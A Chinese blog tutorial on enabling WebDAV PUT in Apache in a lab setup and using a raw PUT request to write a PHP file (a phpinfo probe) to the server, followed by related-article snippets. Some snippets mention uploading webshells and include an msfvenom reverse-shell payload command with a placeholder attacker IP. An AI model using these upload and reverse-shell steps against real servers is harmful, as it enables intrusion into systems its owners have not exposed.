PUT方法上传文件

于 2022-07-14 11:14:33 发布
阅读量5.4k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45711977/article/details/125780490
版权

apache php 服务器

HTTP请求方法之一,作用是允许向服务器直接写入文件

(如果服务器开启put方法,我们不需要任何的代码支持,直接就可以上传文件)

  1. apache如何开启put方法

正常我们先看一下主机的IP地址是多少

我以这台虚拟机来当例子测试一下这台服务器开启的方法,我们通过直接发送一个http的数据包来测试一下

1.测试apache是否开启了put方法

telnet 172.16.132.161 80

------

OPTIONS / HTTP/1.1

HOST:172.16.132.161

------

这里我们就看到了目标服务器的所支持的方法:OPTIONS,GET ,HEAD,POST,TRACE

  1. apache开启put方法操作

开启模块

首先需要先开启apache的两个模块,在httpd.conf文件里搜索dav,删除前面的#号代表开启

启用模块

开启文件锁

我们需要在文件的头部写上一句话

DavLockDB c:\phpstudy\www\DavLock

保存完之后我们需要在www目录下再创建一下这个文件

接下来重启apache就可以了

  1. 上传文件

-----

PUT/info.php http/1.1

Host: 172.16.132.131

Content-Length: 18

<?php phpinfo();?>

-----

上面是http请求报文,前面的put是我们的请求方法,后面的路径是我们上传文件的路径

后面第三行的这个意思是我们的字符串长度是18

这样我们就可以向服务器写入一个文件,文件名就是info.php,文件内容就是php.info

这里要注意尽量不要复制粘贴因为字符长度可能会不一样,put方法是一个非常老的漏洞,基本拿到web站点检查的第一项就是检查put方法

是木木啊.
关注
【文件上传漏洞-02】利用PUT方法上传文件—以Apache为例
m0_64378913的博客
05-31 7315
目录1 http协议请求方法概述2 Apache开启PUT请求方法的过程2.1 实验环境2.3 查询已开启的请求类型2.3 开启put方法3 文件上传漏洞利用3.1 上传PHP探针3.2 上传WebShell4 总结参考文章 1 http协议请求方法概述 具体http/https协议及通信过程可以参考文章《【基础协议】HTTP/HTTPS协议及其工作流程》 常见的请求方法及概述 GET:向特定的资源发出请求。 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。PO
文件上传之中间件PUT上传
qq_42404383的博客
10-16 1360
中间件PUT上传 漏洞说明 中间件包括apache,tomcat,iis,weblogic等,这些中间件可以设置支持http方法。(HTTP方法包括GET,POST,HEAD,DELETE,PUT,OPTINOS等)每一个HTTP方法有对应的功能,在这些方法中,put可以直接从客户机上传文件服务器上如果中间件开放了http的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应目录直接上传webshell,也从侧面反映了PUT漏洞的严重危害性。 渗透攻击 1.信息收集 扫描主机开放全部端口n
使用PUT方法上传文件
热门推荐
xiaofei0859的专栏
10-18 2万+
HTTP中提供了这么多方法,放着不用简直浪费!流行使用POST上传文件是因为当年的Web没有太多API的支持,只能用表单来上传文件,所以后来大家也习惯了使用POST。但现在既然支持了这么多API,用PUT方法上传文件也是可以实现的,而且语义上更合适。 PUT方法的特点是传输的实体部分是一个无结构的二进制数据,而POST方法则倾向于结构化的数据。上传文件这个行为本身就是无结构数据的传输(文件是
PUT上传
weixin_34303897的博客
12-22 187
配置支持PUT上传的web环境 支持put上传需要修改以下配置 http.conf //打开下面两个module LoadModule dav_module modules/mod_dav.so LoadModule dav_fs_module modules/mod_dav_fs.so //增加一下配置,允许Apache支持put方法 <Directory /> Dav On...
上传文件之PUT方法上传(服务器配置不当)
千寻的博客
02-24 9057
实验环境 Window server 2008 +phpstudy 文章目录实验环境第一章 文件上传的条件第二章window server2008开启telnet第三章 Apache 开启PUT 方法第一节 测试Apache 是否开启了put 方法第二节 apache 开启put 方法操作第一步 开启Dav第二步 启用模块第三步.开启文件锁第四章文件上传案例免责声明 第一章 文件上传的条件 We...
Tomcat put任意文件上传
z.mumu的博客
09-10 1311
1.Tomcat8.5.19漏洞 PUT方法任意写文件漏洞(CVE-2017-12615) 打开burp尝试put方法任意文件上传 抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行写在下面,返回201。 冰蝎连接 也可以使用msf生成jsp的木马进行连接 msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp 然后msf设置监听访问 最后就是使用现有的exp 我
pyuploader:使用 HTTP PUT 上传文件的 Python 脚本
06-30
使用 HTTP PUT 上传文件的 Python 脚本。 它支持 BASIC 身份验证。 pyuploader 支持上传单个文件或目录。 此工具可用于将文件上传到系统,例如 Artifactory。 下载 用法 usage: pyuploader.py [-h] --url URL --...
IOS开发教程之put上传文件服务器的配置及实例分享
09-04
在iOS开发中,上传文件是一项常见的任务,而PUT方法常用于更新或替换服务器上的资源。本文将详细讲解如何配置服务器以支持PUT请求,并提供一个实际的iOS上传文件的实例。 首先,了解HTTP中的几种常见方法: 1. GET...
使用okhttp的PUT方式上传文件
03-21 1011
代码实现 /** * @param mediaType MediaType * @param uploadUrl put请求地址 * @param localPath 本地文件路径 * @return 响应的结果 和 HTTP status code * @throws IOException */ public S
实现HTTP PUT方式上传文件
weixin_33788244的博客
11-06 8610
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux ftp 命令行中下载文件get与上传文件put的命令应用详解
09-15
主要介绍了Linux ftp 命令行中下载文件get与上传文件put的命令应用详解,需要的朋友可以参考下
ftp使用命令行上传文件
08-24
ftp使用命令行上传文件
http put上传文件
weixin_34417200的博客
09-28 1067
2019独角兽企业重金招聘Python工程师标准>>> ...
HTTP - PUT 上传文件/Shell
weixin_30240349的博客
04-29 617
今天遇到几个PUT上传的点,但是都没利用起来。一怒之下,在自己本地试了一下。步骤如下: 一、环境: 首先,根据配置Apache服务器支持向目录PUT文件更新一下httpd.conf文件,重启所有服务。 二、HTTP - PUT PUT的前提,是了解HTTP协议。下面给出HTTP - PUT的一个模板: PUT /test.txt HTTP/1.1 Accept: */* Ac...
Linux基础命令---put上传ftp文件
weixin_30635053的博客
05-24 3236
put 使用lftp登录ftp服务器之后,可以使用put指令将文件上传服务器。 1、语法 put[-E][-a][-c][-O base]lfile[-o rfile] 2、选项列表 选项 说明 -o 指定输出文件的名字,不指定则使用原来的名字 -c ...
利用PUT方式上传文件方法研究
aifeier1982的博客
05-31 214
虽然没有POST方法使用广泛,但是PUT方法却是向服务器上传文件最有效率的方法。POST上传文件时,我们通常需要将所有的信息组合成 multipart 传送过去,然后服务器再解码这些信息,解码过程则必不可少的会消耗内存和CPU资源,这种现象在上传大文件时尤其明显。而PUT方法则允许你通过与服务器建立的socket链接传递文件的内容,而不附带其他的信息。 最近一个项目上需要利用这种方式来...
通过HTTP PUT方法实现文件上传的步骤
青春的岁月流逝
07-12 8188
// 1. URLRequest NSURL *url = [NSURL URLWithString:@"http://localhost/uploads/xxx.png"]; NSMutableURLRequest *requestM = [NSMutableURLRequest requestWithURL:url cachePolicy:0 timeoutInterval:2.0
put上传接口数据php,php – 使用API​​ PUT请求上传文件
weixin_32641435的博客
03-17 332
我正在PHP中构建一个API。其中一种方法是place.new(PUT请求)。它期望几个字符串字段,它也期望一个图像。但是我不能让它工作。使用POST请求很容易,但我不知道如何使用PUT和如何在服务器上获取数据。谢谢您的帮助!测试CURL代码$curl = curl_init();curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 2);curl_setopt($...
axios的put方法上传文件后在laravel里面接收不到
最新发布
06-02
axios的put方法上传文件时,需要将文件数据作为FormData对象的一部分来发送请求。在laravel中,可以使用$request->file()方法来获取上传的文件数据。同时,在前端的axios请求中,需要设置"Content-Type"为"multipart/form-data"。 以下是一个示例代码,你可以参考一下: 前端代码: ```javascript const formData = new FormData(); formData.append('file', file); axios.put('/upload', formData, { headers: { 'Content-Type': 'multipart/form-data' } }); ``` 后端代码: ```php public function upload(Request $request) { $file = $request->file('file'); // 处理上传文件的逻辑 } ``` 希望这个回答对你有所帮助!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值